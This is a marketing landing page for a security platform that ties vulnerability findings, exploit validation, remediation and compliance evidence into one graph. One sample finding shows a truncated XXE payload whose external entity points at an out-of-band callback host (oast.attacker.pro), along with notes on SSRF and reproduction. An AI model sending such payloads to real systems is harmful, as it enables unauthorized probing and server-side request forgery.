SPNT

Security Operating System

Your security stack is fragmented.Serpentine replaces it.

One platform for audit, offense, hardening, and governance. Four products sharing one security graph.

Sovereign infrastructure
No customer data used for training.
Finding lifecycle

Active finding

Exposed admin endpoint

Administrative access exposed without authentication

High risk · Validated

Napad

Automated exploit confirmed unauthenticated access. Data exfiltration possible.

Output

Proof-of-concept captured • Reproduction steps documented • Business impact assessed

Shared State

Updates exploitability status in shared graph

Discover
Validate
Remediate
Prove

Most teams would mark this as resolved. It is not.

Validation, remediation, and evidence are disconnected.

Demo environment
2,847 assets monitored156 findings normalized412 evidence mappings

The Problem

Security stacks were not built to work together.

Most teams run separate systems for audit, testing, hardening, and compliance. Each system creates its own output. None of those outputs become a shared operating state.

Your controls are declared, not verified.
Your audit evidence is not defensible.
Your security state is fragmented across tools.

Fragmented operating model

AuditFindings listSeparate context
OffenseExploit notesManual validation
HardeningConfig changesNo evidence reuse
GovernanceCompliance foldersDuplicated evidence

Result: manual correlation, delayed validation, duplicated work

The Shift

From fragmented tools to a security operating system.

Serpentine does not add another dashboard. It changes where security work lives: one shared graph across findings, validation, remediation, and evidence.

FragmentedSerpentine

Current State: Fragmented Tools

Discovery

Vulnerability scanners

No validation

Validation

Manual pentest

No remediation link

Remediation

Ticketing systems

No evidence

Compliance

Spreadsheets

No automation

With Serpentine: Unified System

Discovery

Odbrana

Normalized findings

Validation

Napad

Exploitability confirmed

Remediation

Postava

Policy deployed

Compliance

Regulativa

Evidence mapped

Reality Check

Security posture is often wrong.

Most systems claim controls are in place. Serpentine shows where reality breaks them.

Control State Contradictions
3 UNRESOLVED

Declared control state

All production access requires MFA

Policy assertion dated Jan 2024

Observed enforcement state

2 production systems have no MFA enforcement evidence

Detected by Odbrana scan + Regulativa mapping

Why this matters: Breaks SOC 2 attestation · Invalidates ISO control A.5.15

SOC 2 CC6.1ISO A.5.15

Declared control state

Backups are tested quarterly

BCP policy v2.1 requirement

Observed enforcement state

Last restore test was 274 days ago

No evidence of successful restore since Q1 2025

Why this matters: Audit readiness is not defensible · Control assertion cannot be validated

BCP A.17

Declared control state

All critical findings are resolved

Based on ticket status in ticketing system

Observed enforcement state

Exploitability was never validated

3 findings closed without Napad validation

Why this matters: Creates unverified risk exposure · False closure masks active vulnerabilities

Vuln Mgmt

This is what Serpentine actually produces

OdbranaCRITICAL

XXE Injection — External Entity Processing

POST/catalog/product/stock

Content-Type: application/xml

<!DOCTYPE root [

<!ENTITY xxe SYSTEM

"http://oast.attacker.pro">

]>

...

DNS callback received from target infrastructure

CVSS 9.1 · CWE-611 · Evidence captured

NapadVALIDATED

Exploit Confirmed

Out-of-band DNS callback received

oast.attacker.pro → 203.0.113.42

Reproduction

Send XML payload to endpoint. Observe callback on controlled DNS server.

Proof

External entity resolution confirmed. SSRF to internal network possible.

Linked to finding ODB-2024-0847

RegulativaGAP

Control Contradiction

ControlISO 27001 A.8.8
AssertionInput validation enforced
EvidenceContradicted by ODB-2024-0847

Audit assertion invalidated. Control requires remediation evidence before re-attestation.

See what your system gets wrong

We'll show real contradictions in your environment.

Book a Demo

30-minute technical walkthrough · No slides, real system

The Architecture

Inside the shared security graph.

Serpentine does not move data between disconnected tools. It stores findings, validation, remediation, evidence, controls, assets, risks, and actions in one operating state.

Inputs
Scanner output
Attack validation
Hardening actions
Compliance requirements
Shared Security GraphSingle source of truth
Assets

Written by: Postava

Used by: All

·
Findings

Written by: Odbrana

Used by: Napad, Regulativa

·
Validation

Written by: Napad

Used by: Postava, Regulativa

·
Remediation

Written by: Postava

Used by: Regulativa

·
Evidence

Written by: All

Used by: Regulativa

·
Controls

Written by: Regulativa

Used by: All

·
Risks

Written by: All

Used by: Reporting

·
Actions

Written by: All

Used by: Workflow

Hover any entity to see which modules write and read it

Outputs
Validated risk
Remediation path
Audit evidence
Executive reporting

This is not a dashboard aggregating external data. This is an operating system where every action updates the same state.

The Mechanism

How Serpentine turns findings into evidence.

1

Normalize

Odbrana

Turns scanner output into structured findings.

Updates the same operating state

2

Validate

Napad

Confirms whether the risk is exploitable.

Updates the same operating state

3

Remediate

Postava

Creates or applies hardening policy.

Updates the same operating state

4

Prove

Regulativa

Maps the outcome to controls and evidence.

Updates the same operating state

The value is not the steps.

The value is that every step updates one system.

Use Cases

Built for the teams responsible for proving security.

CISO

  • Risk visibility across all domains
  • Board-ready security posture
  • Audit-ready evidence on demand
Explore use case

CTO / Engineering

  • Fewer tools to manage
  • Faster remediation cycles
  • Less security debt
Explore use case

MSSP / Security Firm

  • Repeatable delivery model
  • Client-ready reporting
  • Multi-tenant workflows
Explore use case

Trust

Trust, published.

Security platforms cannot ask for trust while hiding their own controls. SPNT publishes its security posture, subprocessors, responsible disclosure policy, and data handling documentation.

EU Region: Frankfurt, AmsterdamZero Training: Customer data never usedSOC 2 Type II: In progress

This is what we'll show you

Finding discovered
Risk validated
Remediation applied
Evidence mapped

This is not a demo environment. This is how your system will be evaluated.

One finding. Full lifecycle. Real validation.

See what your current stack misses.

Book a live walkthrough. We will show how one finding exposes gaps in validation, remediation, and evidence that most teams never see.

30-minute technical walkthroughNo slides, real systemWe use your use case or ours